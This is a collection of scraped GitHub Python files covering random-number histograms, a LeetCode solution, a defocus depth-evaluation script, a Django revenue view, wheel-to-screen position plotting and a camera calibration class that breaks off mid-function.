{"seq_id":"1103215827","text":"# Python code that creates a histogram (gazou4-1.py)\n\n# coding: utf-8\n# Import the libraries needed for uniform random numbers, arithmetic, and plotting\nimport numpy as np\nimport matplotlib.pyplot as plt\n \n# Number of times the random numbers are summed\nN = 1200\n# Number of random numbers to generate\nn = 10000\nf = []\ns = 0\n \n# Note that the mean N/2 is subtracted so that the result has mean 0.\nfor i in range(N):\n    s += np.random.rand(n)\nf.append(s - N/2)\n \n# Print the mean and the standard deviation\nprint(\"Average : \" + str(np.average(f)))\nprint(\"std-dev : \" + str(np.std(f)))\n \n# By Sturges' formula the number of bins p would be 14; here the square-root choice of 100 is used instead.\np = 100\nplt.hist(f, bins=p)\nplt.ylabel(\"Frequency\")\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Python code that varies the number of random numbers n and plots the change in the standard deviation and the mean as scatter plots (gazou4-2.py)\n\n# coding: utf-8\n# Import the libraries needed for uniform random numbers, arithmetic, and plotting\nimport numpy as np\nimport matplotlib.pyplot as plt\n \n# Initialization etc.\nave_list = []\nstd_list = []\n# Generate counts of random numbers from 0 to n. Changing this n changes the maximum number of random numbers.\nn = 1000\n \n \ndef returner(n):\n    # Number of times the random numbers are summed\n    N = 1200\n    f = []\n    s = 0\n    for i in range(N):\n        s = s + np.random.rand(n)\n    f.append(s - N / 2)\n    return np.average(f), np.std(f)\n \n \n# Vary the number of random numbers n and append the results to the lists.\nfor i in range(n):\n    x = i + 1\n    # Print progress every 100 iterations\n    if x % 100 == 0:\n        print(\"We are at:\" + str(x))\n    # Append the mean and standard deviation for each n to the lists.\n    # returner() returns (mean, std) as a tuple; unpack it once so both statistics come from the same sample.\n    ave, std = returner(x)\n    ave_list.append(ave)\n    std_list.append(std)\n \n# List of the numbers of random numbers for plotting\nX = []\nfor i in range(n):\n    x = i\n    X.append(x)\n \n# Draw the scatter plot of the standard deviation\nplt.scatter(X, std_list, s=10)\nplt.xlabel(\"Number of random 
numbers\")\nplt.ylabel(\"Standard deviation\")\nplt.grid(True)\nplt.show()\n# 平均値の散布図の描画\nplt.scatter(X, std_list, s=10)\nplt.xlabel(\"Number of random numbers\")\nplt.ylabel(\"Average\")\nplt.grid(True)\nplt.show()\n","repo_name":"chikisam999/GazouKougaku","sub_path":"gazoukougaku4.py","file_name":"gazoukougaku4.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32161307605","text":"# Question: https://leetcode.com/explore/challenge/card/may-leetcoding-challenge/537/week-4-may-22nd-may-28th/3337/\n\n\"\"\"\nGiven a string, sort it in decreasing order based on the frequency of characters.\n\nExample 1:\n Input: \"tree\"\n Output: \"eert\"\n Explanation:\n 'e' appears twice while 'r' and 't' both appear once.\n So 'e' must appear before both 'r' and 't'. Therefore \"eetr\" is also a valid answer.\n\nExample 2:\n Input: \"cccaaa\"\n Output: \"cccaaa\"\n Explanation:\n Both 'c' and 'a' appear three times, so \"aaaccc\" is also a valid answer.\n Note that \"cacaca\" is incorrect, as the same characters must be together.\n\nExample 3:\n Input: \"Aabb\"\n Output: \"bbAa\"\n Explanation:\n \"bbaA\" is also a valid answer, but \"Aabb\" is incorrect.\n Note that 'A' and 'a' are treated as two different characters.\n\"\"\"\n\nfrom collections import Counter\nfrom operator import itemgetter\n\nclass Solution:\n def frequencySort(self, s): # frequencySort(self, s: str) -> str\n # Input = 'tree'\n\n c = Counter(s)\n # Returns Counter({'e': 2, 't': 1, 'r': 1})\n\n c_keys = list(c.keys()) # List which stores keys from the Counter(s)\n # Returns ['e', 't', 'r']\n \n c_values = list(c.values()) # List which stores values from the Counter(s)\n # Returns [2,1,1]\n\n # Sorts the zipped list, on the basis of frequency of characters, and then reverses it\n s_sorted = sorted(zip(c_keys, c_values), key = itemgetter(1), reverse=True)\n # Returns [('e', 2), ('t', 1), ('r', 1)]\n\n # Creates a new list which stores each character whose length is equal to its frequency \n s_joined = list(map(lambda i: i[0]*i[1], s_sorted))\n # Returns ['ee', 't', 'r']\n \n return ''.join(s_joined)\n # Returns 'eetr'\n\ninputs = ['tree', 'cccaaa', 'Aabb']\noutputs = [\n ['eetr', 'eert'],\n ['cccaaa', 'aaaccc'],\n ['bbAa', 'bbaA']\n]\n\nS = Solution()\nfor i in range(len(inputs)):\n if S.frequencySort(inputs[i]) in outputs[i]:\n print('Case {} passed'.format(i+1))\n else:\n print('Case {} failed'.format(i+1))\n","repo_name":"patel-himanshu/leetcode-problems","sub_path":"2020 - May LeetCoding Challenge/451-sort-characters-by-frequency.py","file_name":"451-sort-characters-by-frequency.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34969242662","text":"from argparse import ArgumentParser, Namespace\nimport pylicense.repos as repos\n\n\ndef dispatch(parser: ArgumentParser, cli_args: Namespace):\n if cli_args.inputfile is None:\n parser.print_help()\n exit(1)\n\n if cli_args.repository == \"pypi\":\n r_parser = repos.PyPIRepoParser()\n elif cli_args.repository == \"anaconda\":\n r_parser = repos.AnacondaRepoParser()\n elif cli_args.repository == \"conda-forge\":\n r_parser = repos.CondaForgeRepoParser()\n\n pkgs_info = r_parser.from_io(cli_args.inputfile)\n if cli_args.output_format == \"csv\":\n print(r_parser.as_csv(pkgs_info, separator=cli_args.csv_separator))\n elif cli_args.output_format == \"markdown\":\n 
print(r_parser.as_markdown(pkgs_info))\n elif cli_args.output_format == \"json\":\n print(r_parser.as_json(pkgs_info))","repo_name":"dotcs/pylicense","sub_path":"pylicense/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"75210524624","text":"\"\"\"Utilities for nolearn's neural net\"\"\"\n\nimport numpy as np\n\n\nclass EarlyStopping(object):\n def __init__(self, patience=100):\n self.patience = patience\n self.best_valid = np.inf\n self.best_valid_epoch = 0\n self.best_weights = None\n\n def __call__(self, nn, train_history):\n current_valid = train_history[-1]['valid_loss']\n current_train = train_history[-1]['train_loss']\n current_epoch = train_history[-1]['epoch']\n\n # Ignore if training loss is greater than valid loss\n if current_train > current_valid:\n return\n\n if current_valid < self.best_valid:\n self.best_valid = current_valid\n self.best_valid_epoch = current_epoch\n self.best_weights = [w.get_value() for w in nn.get_all_params()]\n elif self.best_valid_epoch + self.patience < current_epoch:\n print('Early stopping.')\n print('Best valid loss was {:.6f} at epoch {}.'.format(\n self.best_valid, self.best_valid_epoch))\n nn.load_weights_from(self.best_weights)\n raise StopIteration()\n\n\nclass StepDecay(object):\n def __init__(self, name, start=0.03, stop=0.001, delay=0):\n self.name = name\n self.delay = delay\n self.start, self.stop = start, stop\n self.ls = None\n\n def __call__(self, net, train_history):\n if self.ls is None:\n self.ls = np.linspace(self.start, self.stop, net.max_epochs - self.delay)\n\n epoch = train_history[-1]['epoch'] - self.delay\n if epoch >= 0:\n new_value = float32(self.ls[epoch - 1])\n getattr(net, self.name).set_value(new_value)\n\n\ndef float32(x):\n return np.cast['float32'](x)\n","repo_name":"felixlaumon/kaggle-plankton","sub_path":"plankton/net_utils.py","file_name":"net_utils.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5931582908","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nfrom torchvision import transforms, utils\nfrom arch import dofNet_arch3,dofNet_arch4\n\nimport numpy as np\nimport importlib\nimport util_func\nimport argparse\nfrom dataloaders import DDFF12,focalblender,NYU_blurred,DSLR\n\nparser = argparse.ArgumentParser(description='camIndDefocus')\nparser.add_argument('--datapath', default='C:\\\\Users\\\\***\\\\focalstacks\\\\datasets\\\\defocusnet_N1\\\\', help='blender data path')\n# parser.add_argument('--datapath', default=\"C:\\\\Users\\\\***\\\\focalstacks\\\\datasets\\\\mediumN1-10_test_remapped\\\\\", help='blender data path')\n# parser.add_argument('--datapath', default=\"C://Users//***//focalstacks//datasets//mediumN1//\", help='blender data path')\n# parser.add_argument('--datapath', default='C:\\\\Users\\\\***\\\\data\\\\DSLR\\\\dfd_indoor\\\\dfd_dataset_indoor_N2_8\\\\', help='blender data path')\n# parser.add_argument('--datapath', default='C:\\\\Users\\\\***\\\\data\\\\nyu_depth\\\\noborders\\\\', help='blender data path')\nparser.add_argument('--kcamfile', default=None, help='blender data path')\n# parser.add_argument('--ddffpth', default='C:\\\\Users\\\\***\\\\focalstacks\\\\datasets\\\\my_dff_trainVal.h5', help='blender data path')\nparser.add_argument('--dataset', 
default='defocusnet', help='dataset name')\nparser.add_argument('--datanum', default='9', help='dataset number. Only applicable for NYU depth')\nparser.add_argument('--bs', type=int,default=1, help='training batch size')\nparser.add_argument('--depthscale', type=float,default=1.,help='divide all depths by this value')\nparser.add_argument('--checkpt', default=r'C:\\Users\\***\\models\\camind\\camind_defocusnet_bs_12_depth_1_dweight_1.0_bweight_1.0\\3269.pth', help='path to the saved model')\nparser.add_argument('--s2limits', nargs=\"*\", default=[0.1,3.0], help='the interval of depth where the errors are calculated')\nparser.add_argument('--blurclip', type=float,default=6.5,help='Clip blur by this value : only applicable for camind model. Default=10')\nparser.add_argument('--camind', type=bool,default=True, help='True: use camera independent model. False: use defocusnet model')\nparser.add_argument('--aif', type=bool,default=False, help='True: Train with the AiF images. False: Train with blurred images')\nparser.add_argument('--out_depth', type=int,default=1, help='True: use camera independent model. False: use defocusnet model')\nparser.add_argument('--kcamscale', type=float,default=30,help='Scale up everything after blur prediction and before they are sent to the depth prediction network')\nargs = parser.parse_args()\n\n'''\nload model\n'''\n#GPU or CPU\ndevice_comp = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nif(args.out_depth==1):\n ch_inp_num = 3\n ch_out_num = 1\n model = dofNet_arch4.AENet(ch_inp_num, 1, 16, flag_step2=True)\n model = model.to(device_comp)\n model_params = model.parameters()\nelif(args.out_depth==0):\n ch_inp_num = 3\n ch_out_num = 1\n model = dofNet_arch3.AENet(ch_inp_num, 1, 16, flag_step2=True)\n model = model.to(device_comp)\n model_params = model.parameters()\n\n# loading weights of the first step\nif args.checkpt:\n print('loading model....')\n print('model path :'+args.checkpt)\n pretrained_dict = torch.load(args.checkpt)\n model_dict = model.state_dict()\n for param_tensor in model_dict:\n for param_pre in pretrained_dict:\n if param_tensor == param_pre:\n model_dict.update({param_tensor: pretrained_dict[param_pre]})\n model.load_state_dict(model_dict)\n\n #load the required dataset\nif(args.dataset=='blender'):\n print('eval blender')\n if(args.kcamfile):\n kcampath=args.datapath+args.kcamfile\n else:\n kcampath=None\n loaders, total_steps = focalblender.load_data(args.datapath,blur=1,aif=args.aif,train_split=0.8,fstack=0,WORKERS_NUM=0,\n BATCH_SIZE=args.bs,FOCUS_DIST=[0.1,.15,.3,0.7,1.5,100000],REQ_F_IDX=[0,1,2,3,4],MAX_DPT=1.0,\n blurclip=args.blurclip,dataset=args.dataset,out_depth=args.out_depth,\n kcampath=kcampath)\nelif(args.dataset=='ddff'):\n DDFF12_train = DDFF12.DDFF12Loader(args.ddffpth, stack_key=\"stack_train\", disp_key=\"disp_train\", n_stack=10,\n min_disp=0.02, max_disp=0.28,fstack=0,idx_req=[9])\n DDFF12_val = DDFF12.DDFF12Loader(args.ddffpth, stack_key=\"stack_val\", disp_key=\"disp_val\", n_stack=10,\n min_disp=0.02, max_disp=0.28, b_test=False,fstack=0,idx_req=[6,5,4,3,2,1,0])\n DDFF12_train, DDFF12_val = [DDFF12_train], [DDFF12_val]\n\n dataset_train = torch.utils.data.ConcatDataset(DDFF12_train)\n dataset_val = torch.utils.data.ConcatDataset(DDFF12_val) # we use the model perform better on DDFF12_val\n\n TrainImgLoader = torch.utils.data.DataLoader(dataset=dataset_train, num_workers=0, batch_size=1, shuffle=True, drop_last=True)\n ValImgLoader = torch.utils.data.DataLoader(dataset=dataset_val, 
num_workers=0, batch_size=1, shuffle=False, drop_last=True)\nelif(args.dataset=='defocusnet'):\n    print('Getting defocusnet data...')\n    loaders, total_steps = focalblender.load_data(args.datapath,blur=1,aif=0,train_split=0.8,fstack=0,WORKERS_NUM=0,\n    BATCH_SIZE=args.bs,FOCUS_DIST=[0.1,.15,.3,0.7,1.5],REQ_F_IDX=[0,1,2,3,4],MAX_DPT=1.0,blurclip=1.0,dataset=args.dataset,\n    out_depth=args.out_depth)\nelif(args.dataset=='nyu'):\n    print('Getting NYU data...')\n    datanum=args.datanum\n    loaders, total_steps = NYU_blurred.load_data(datapath=args.datapath,datanum=datanum,blur=1,fstack=0,WORKERS_NUM=0,\n    BATCH_SIZE=1,blurclip=args.blurclip,out_depth=args.out_depth)\nelif(args.dataset==\"DSLR\"):\n    loaders=DSLR.load_data(datapath=args.datapath,train_n=10,blur=1,WORKERS_NUM=0,\n    BATCH_SIZE=1,out_depth=args.out_depth)\n    \n# testing\nfor st_iter, sample_batch in enumerate(loaders[0]):\n    if(args.dataset==\"nyu\"):\n        X=sample_batch['rgb'].float().to(device_comp)\n        depth=sample_batch['depth'].float().to(device_comp)\n        blur=sample_batch['blur'].float().to(device_comp)\n        depth=torch.unsqueeze(depth,dim=1)\n        blur=torch.unsqueeze(blur,dim=1)\n        stacknum=X.shape\n    else:\n        # Setting up input and output data\n        X = sample_batch['input'][:,0,:,:,:].float().to(device_comp)\n        depth=sample_batch['depth'].float().to(device_comp)\n        blur=sample_batch['blur'].float().to(device_comp)\n        focus_distance=sample_batch['fdist']\n        focus_distance=torch.unsqueeze(focus_distance,dim=2).unsqueeze(dim=3)\n        focus_distance=torch.repeat_interleave(focus_distance,depth.shape[2],dim=2).repeat_interleave(depth.shape[3],dim=3)\n        focus_distance=focus_distance.to(device_comp)\n\n    if(len(args.s2limits)==2):\n        if(args.out_depth==1):\n            mask=(depth>args.s2limits[0])*(depth<args.s2limits[1])\n        else:\n            mask=((focus_distance*depth)>args.s2limits[0])*((focus_distance*depth)<args.s2limits[1])\n\n    # (forward pass omitted here: it computes pred_blur, corrected_blur and pred_depth from the model)\n    print('pred blur:'+str(torch.mean(pred_blur[mask>0])))\n    print('corrected blur:'+str(torch.mean(corrected_blur[mask>0])))\n    print('pred depth:'+str(torch.mean(pred_depth[mask>0])))\n    print('GT depth:'+str(torch.mean((depth)[mask>0])))\n    break\n\nimport matplotlib.pyplot as plt\npred_depth_=pred_depth\npred_depth_[mask<=0]=0\npred=pred_depth_.detach().cpu().numpy().squeeze()\nplt.imshow(pred)\nplt.show()\n\nd=depth.detach().cpu().numpy().squeeze()\nplt.imshow(d)\nplt.show()\n\nb=blur.detach().cpu().numpy().squeeze()\nplt.imshow(b)\nplt.show()\n\npb=pred_blur.detach().cpu().numpy().squeeze()\nplt.imshow(pb)\nplt.show()\n\ndef main():\n    if(args.dataset=='blender' or args.dataset=='defocusnet' or args.dataset=='nyu'): \n        print('evaluating on blender, defocusnet or nyu') \n        depthMSE,valueMSE,blurloss,meanblur,gtmeanblur,minblur,maxblur=util_func.eval(model,loaders[1],args,device_comp)\n        #util_func.kcamwise_blur(model,loaders[1],args,device_comp)\n    elif(args.dataset=='DSLR'):\n        fd_in=1.0\n        for kcam_in in [1.3]:\n            for f_in in [6]:\n                f_in=f_in*1e-3\n                for fd_in in [1.0]:\n                    print('***** fd = '+str(fd_in))\n                    depthMSE,valueMSE,blurloss,meanblur,gtmeanblur,minblur,maxblur=util_func.eval(model,loaders[1],args,device_comp,calc_distmse=False,\n                    kcam_in=kcam_in,f_in=f_in,fd_in=fd_in)\n                    print('s2 loss2: MSE: '+str(depthMSE)+\" RMSE:\"+str(depthMSE**0.5))\n    elif(args.dataset=='ddff'):\n        print('DDFF dataset Evaluation')\n        kcam=5.0\n        for kcam in [0.1,0.5,0.8,11,12,13,14,15,16,17,18]:\n            print('kcam=%2.2f'%(kcam))\n            depthMSE,valueMSE,blurloss,meanblur,gtmeanblur,minblur,maxblur=util_func.eval(TrainImgLoader,model_info,args.depthscale,args.fscale,args.s2limits,\n            dataset=args.dataset,camind=args.camind,aif=args.aif,kcam=kcam,f=9.5e-3)\n            print('MSE:%2.4f'%(s2loss2))\n    \n    print('s2 loss2: MSE: '+str(depthMSE)+\" 
RMSE:\"+str(depthMSE**0.5))\n print('blur loss = '+str(blurloss))\n print('mean blur = '+str(meanblur)) \n print('min blur = '+str(minblur))\n print('max blur = '+str(maxblur)) \n print('gt mean blur = '+str(gtmeanblur)) \n print('__________________')\n \nif __name__ == \"__main__\":\n main()\n\n'''\n#plot MSE vs dist for various S1 values\nimport matplotlib.pyplot as plt\ns2=[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8]\nmse1=[0.026,0.040,0.053,0.058,0.067,0.087,0.121,0.171,0.239,0.319,0.422,0.538,0.685,0.855,1.040,1.253,1.489,1.709]\nmse2=[0.050,0.028,0.026,0.032,0.045,0.067,0.105,0.157,0.229,0.312,0.418,0.541,0.690,0.857,1.049,1.270,1.505,1.707]\nmse3=[0.126,0.089,0.049,0.022,0.013,0.018,0.040,0.077,0.133,0.199,0.291,0.404,0.534,0.686,0.861,1.064,1.288,1.545]\nmse4=[0.114,0.099,0.073,0.041,0.023,0.018,0.028,0.054,0.099,0.155,0.235,0.336,0.453,0.592,0.750,0.941,1.153,1.458]\nmse5=[0.128,0.114,0.092,0.060,0.035,0.024,0.026,0.043,0.078,0.126,0.197,0.288,0.393,0.519,0.667,0.842,1.044,1.384]\n\nplt.plot(s2,mse1,'-b',label='s1=0.1',marker=\".\", markersize=7)\nplt.plot(s2,mse2,'-r',label='s1=0.15',marker=\"*\", markersize=7)\nplt.plot(s2,mse3,'-g',label='s1=0.3',marker=\"1\", markersize=7)\nplt.plot(s2,mse4,'-m',label='s1=0.7',marker=\"d\", markersize=7)\nplt.plot(s2,mse5,'-c',label='s1=1.5',marker=\"+\", markersize=7)\nplt.legend(loc=\"upper left\")\nplt.title('MSE vs distance')\nplt.xlabel('distance(s2)-m')\nplt.ylabel('MSE')\nplt.savefig('s2vsmse.png', dpi=500)\nplt.show()\n'''\n\n'''\nimport util_func\n\np=3.1e-3/256\nN=2\nf=6e-3\ns2range=[0.1,2.0]\ns1range=[0.1,2.0]\nblur_thres=3.0\nutil_func.get_workable_s1s2ranges(p,N,f,s2range,s1range,blur_thres,imgratio=1)\n'''\n\n'''\nEvaluating focal length variation data\nf=3mm\ns1=1.5\ns2 : 0.15 - 1.0\nMSE\ncamind GTkcam:0.0516 kcamestGT:0.0500 kcamestDVF:0.0511\nno camind:0.1005\ndefocus: 0.1932\naif:0.0996\n\nf=4mm\ns1=1.5\ns2: 0.15-1.0\nMSE\ncamind GTkcam:0.0478 kcamestGT:0.0422 kcamestDVF:0.0449\nno camind: 0.0530\ndefocus: 0.1898\naif: 0.0819\n\nf=5mm\ns1=1.5\ns2: 0.3-1.0\nMSE\ncamind GTkcam:0.0547 kcamestGT:0.0488 kcamestDVF:0.0511\ndefocus : 0.1879\naif: 0.0827\n\nf=6mm\ns1=1.5\ns2: 0.5 - 1.0\nMSE\ncamind GTkcam:0.0620 kcamestGT:0.0604 kcamestDVF:0.0585\ndefocus : 0.0548\naif:0.1008\n'''\n\n'''\ndist wise error \ns1=1.5m\nwith estimatef kcam\nf=3mm\n0.053,0.062,0.043,0.025,0.018,0.031,0.052,0.080,0.134,0.204,0.302,0.401,0.500,0.614,0.786,0.952,1.122,1.233\nf=4mm\n0.057,0.051,0.053,0.058,0.035,0.032,0.035,0.046,0.066,0.118,0.218,0.289,0.363,0.509,0.592,0.770,0.886,1.061\nf=5mm\n0.055,0.024,0.031,0.051,0.057,0.048,0.036,0.059,0.100,0.158,0.165,0.243,0.250,0.391,0.687,0.749,0.746,0.903\nf=6mm\n0.107,0.056,0.054,0.037,0.065,0.048,0.085,0.107,0.122,0.153,0.279,0.329,0.392,0.629,0.762,0.577,0.808,1.116\n'''\n'''\nimport matplotlib.pyplot as plt\ns2=[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8]\n#DVF estimated kcam\nmse1=[0.053,0.062,0.043,0.025,0.018,0.031,0.052,0.080,0.134,0.204,0.302,0.401,0.500,0.614,0.786,0.952,1.122,1.233]\nmse2=[0.057,0.051,0.053,0.058,0.035,0.032,0.035,0.046,0.066,0.118,0.218,0.289,0.363,0.509,0.592,0.770,0.886,1.061]\nmse3=[0.055,0.024,0.031,0.051,0.057,0.048,0.036,0.059,0.100,0.158,0.165,0.243,0.250,0.391,0.687,0.749,0.746,0.903]\nmse4=[0.107,0.056,0.054,0.037,0.065,0.048,0.085,0.107,0.122,0.153,0.279,0.329,0.392,0.629,0.762,0.577,0.808,1.116]\n\n#GT 
kcams\nmse1=[0.185,0.102,0.081,0.055,0.084,0.044,0.102,0.107,0.096,0.131,0.228,0.290,0.347,0.553,0.730,0.527,0.850,0.815]\nmse2=[0.068,0.031,0.031,0.054,0.066,0.050,0.037,0.055,0.097,0.143,0.164,0.256,0.259,0.412,0.709,0.750,0.749,0.842]\nmse3=[0.069,0.052,0.057,0.060,0.041,0.033,0.033,0.043,0.063,0.109,0.209,0.279,0.360,0.500,0.580,0.732,0.856,1.009]\nmse4=[0.061,0.071,0.051,0.032,0.022,0.028,0.042,0.066,0.111,0.172,0.266,0.361,0.456,0.554,0.723,0.874,1.021,1.118]\n\nplt.plot(s2,mse1,'-b',label='f=3mm',marker=\".\", markersize=7)\nplt.plot(s2,mse2,'-r',label='f=4mm',marker=\"*\", markersize=7)\nplt.plot(s2,mse3,'-g',label='f=5mm',marker=\"1\", markersize=7)\nplt.plot(s2,mse4,'-m',label='f=6mm',marker=\"d\", markersize=7)\nplt.legend(loc=\"upper left\")\nplt.title('MSE vs distance')\nplt.xlabel('distance(s2)-m')\nplt.ylabel('MSE')\nplt.savefig('s2vsmse_f_DVFkcam.png', dpi=500)\nplt.show()\n'''\n\n\n\n\n\n\n\n\n","repo_name":"sleekEagle/defocus_camind","sub_path":"source/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":14754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74229303825","text":"from django.db.models import Sum, OuterRef, Subquery\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\n\nfrom spend.models import SpendStatistic\nfrom .models import RevenueStatistic\nfrom .serializers import RevenueRetrieveSerializer, RevenueSerializer\n\n\nclass RevenueStatisticsView(APIView):\n def get(self, request):\n spend_subquery = SpendStatistic.objects.filter(revenuestatistic=OuterRef('pk')).values('revenuestatistic')\n\n total_spend_subquery = Subquery(\n SpendStatistic.objects.filter(revenuestatistic=OuterRef(\"pk\"))\n .values(\"revenuestatistic\")\n .annotate(total=Sum(\"spend\"))\n .values(\"total\")[:1]\n )\n\n total_impressions_subquery = Subquery(\n SpendStatistic.objects.filter(revenuestatistic=OuterRef(\"pk\"))\n .values(\"revenuestatistic\")\n .annotate(total=Sum(\"impressions\"))\n .values(\"total\")[:1]\n )\n\n total_clicks_subquery = Subquery(\n SpendStatistic.objects.filter(revenuestatistic=OuterRef(\"pk\"))\n .values(\"revenuestatistic\")\n .annotate(total=Sum(\"clicks\"))\n .values(\"total\")[:1]\n )\n\n total_conversions_subquery = Subquery(\n SpendStatistic.objects.filter(revenuestatistic=OuterRef(\"pk\"))\n .values(\"revenuestatistic\")\n .annotate(total=Sum(\"conversion\"))\n .values(\"total\")[:1]\n )\n\n queryset = RevenueStatistic.objects.annotate(\n total_revenue=Sum(\"revenue\"),\n total_spend=total_spend_subquery,\n total_impressions=total_impressions_subquery,\n total_clicks=total_clicks_subquery,\n total_conversions=total_conversions_subquery,\n )\n\n truncated_data = []\n for item in queryset:\n item[\"date\"] = item[\"date\"].strftime(\"%Y-%m-%d\")\n truncated_data.append(item)\n\n serializer = RevenueRetrieveSerializer(truncated_data, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def post(self, request):\n serializer = RevenueSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, 
status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"volodymyr-komarnyckyi/test_task","sub_path":"revenue/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"32277106659","text":"\"\"\"\nRE spits out ticks [-512, 512] which is a full turn of the wheel\nI linearly rescale it to [-180, 180] # wheel degrees\nThe screen \"wants\" a positionX from [-1, 1] where 0 is the center of the screen\nI then divide all positions as they are coming by a GainFactor\nGainFactor = 1 / (mm_per_deg * UserDefinedGain)\nUserDefinedGain = 4.0\nmm_per_deg = (2 * Pi * WheelRadius) / 360\nwhere WheelRadius = 31mm\n\nNow that I have the transformation done as if the stimulus would start from the center I need to\noffset it by the InitPosition of the stimulus (either -35 or 35)\nThen for \"safety\" I pass an unwrapping function for the cases when the stimulus might go over the\nedge of the screen\nI do this in the same go\n((InitPosition + out_value) + 180) % 360 - 180 and that is what is sent to the screen...\n\n((-35 + (1 / (1 / ((math.pi * 2 * 31) / 360) * 4))) + 180) % 360 -180\n\"\"\"\nimport math\nimport matplotlib.pyplot as plt\n\n\nWHEEL_RADIUS = 31\nUSER_DEFINED_GAIN = 4.0\nMM_PER_DEG = (2 * math.pi * WHEEL_RADIUS) / 360\nGAIN_FACTOR = 1 / (MM_PER_DEG * USER_DEFINED_GAIN)\n\n\ndef get_scale_shift(from_min, from_max, to_min, to_max):\n    scale = (to_max - to_min) / (from_max - from_min)\n    shift = -from_min * scale + to_min\n    return scale, shift\n\n\ndef rescale(input, from_min, from_max, to_min, to_max):\n    scale, shift = get_scale_shift(from_min, from_max, to_min, to_max)\n    try:\n        iter(input)\n    except TypeError:\n        input = [input]\n\n    for i in input:\n        yield i * scale + shift\n\n\nRE_TICKS = range(-512, 512)\nRE_TICK_DEG_VALUE = list(rescale(RE_TICKS, -512, 512, -180, 180))\n\n\ndef pos_on_screen(pos, init_pos):\n    try:\n        iter(pos)\n    except TypeError:\n        pos = [pos]\n\n    for p in pos:\n        yield (((p / GAIN_FACTOR) + init_pos) + 180) % 360 - 180\n\n\nrelative_wheel_degrees = range(-20, 21)  # RE_TICK_DEG_VALUE\nabsolute_screen_deg_form_left_stim = list(pos_on_screen(relative_wheel_degrees, -35))\nabsolute_screen_deg_form_right_stim = list(pos_on_screen(relative_wheel_degrees, 35))\n\nax = plt.subplot(111)\nax.plot(\n    relative_wheel_degrees, absolute_screen_deg_form_left_stim, c=\"b\", ls=\"--\", marker=\".\",\n)\nax.plot(relative_wheel_degrees, absolute_screen_deg_form_right_stim[::-1], \"g.--\")\nax.axhline()\nax.axhline(-35)\nax.axhline(35)\nax.axhline(70, c=\"gray\")\nax.axhline(-70, c=\"gray\")\nax.set_xlabel(f\"Wheel degrees - Gain = {USER_DEFINED_GAIN}\")\nax.set_ylabel(f\"Screen degrees - Gain = {USER_DEFINED_GAIN}\")\n# ax.clear()\nplt.show()\n","repo_name":"int-brain-lab/iblrig","sub_path":"scripts/wheel_positions.py","file_name":"wheel_positions.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"}
{"seq_id":"6318727856","text":"import logging\nimport os\nimport time\nimport datetime\n\n__author__ = 'Mark'\n\nimport cv2\nfrom pattern_type import PatternType\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass CameraCalibrator:\n    def __init__(self, pattern_type, pattern_dims, image_size):\n        if pattern_type is not PatternType.Checkerboard:\n            raise NotImplementedError(\"Currently implemented only for checkerboard pattern\")\n\n        self.pattern_dims = pattern_dims\n        self.image_size = 
image_size\n\n #Position of calibration points in real world: just a grid on x,y dimensions (z=0)\n self._pattern_object_points = np.zeros((self.pattern_dims[0] * self.pattern_dims[1], 3), np.float32)\n self._pattern_object_points[:, :2] = np.mgrid[0:self.pattern_dims[0], 0: self.pattern_dims[1]].T.reshape(-1, 2)\n\n self.number_of_samples = 0\n self._calibration_object_points = []\n self._calibration_samples = []\n\n # Calibration results:\n self.accuracy = 0\n self.coefficients = []\n self.original_camera_matrix = []\n self.new_camera_matrix = []\n\n self.map_x = np.array([])\n self.map_y = np.array([])\n #self.reverse_map_x = np.array([])\n #self.reverse_map_y = np.array([])\n self.roi = []\n self.alpha = 0\n\n def clear(self):\n self.number_of_samples = 0\n self._calibration_object_points = []\n self._calibration_samples = []\n\n def add_sample(self, pattern_points):\n self._calibration_object_points.append(self._pattern_object_points)\n self._calibration_samples.append(pattern_points)\n self.number_of_samples += 1\n\n def calibrate(self):\n self.accuracy, self.original_camera_matrix, self.coefficients, _, _ = \\\n cv2.calibrateCamera(self._calibration_object_points, self._calibration_samples, self.image_size, None, None)\n logging.info(\"distortion coeffs (k1,k2,p1,p2[,k3[,k4,k5,k6]]) = {}\".format(self.coefficients))\n # Use the same camera_matrix\n self.roi = None\n self.new_camera_matrix = self.original_camera_matrix\n\n def calculate_new_camera_matrix(self, alpha=None, center_principal_point=True):\n logging.debug(\"Calculating new camera matrix.\")\n if alpha is not None:\n self.alpha = alpha\n # Calculate new camera matrix\n self.new_camera_matrix, self.roi = cv2.getOptimalNewCameraMatrix(\n self.original_camera_matrix,\n self.coefficients,\n self.image_size,\n self.alpha,\n self.image_size,\n 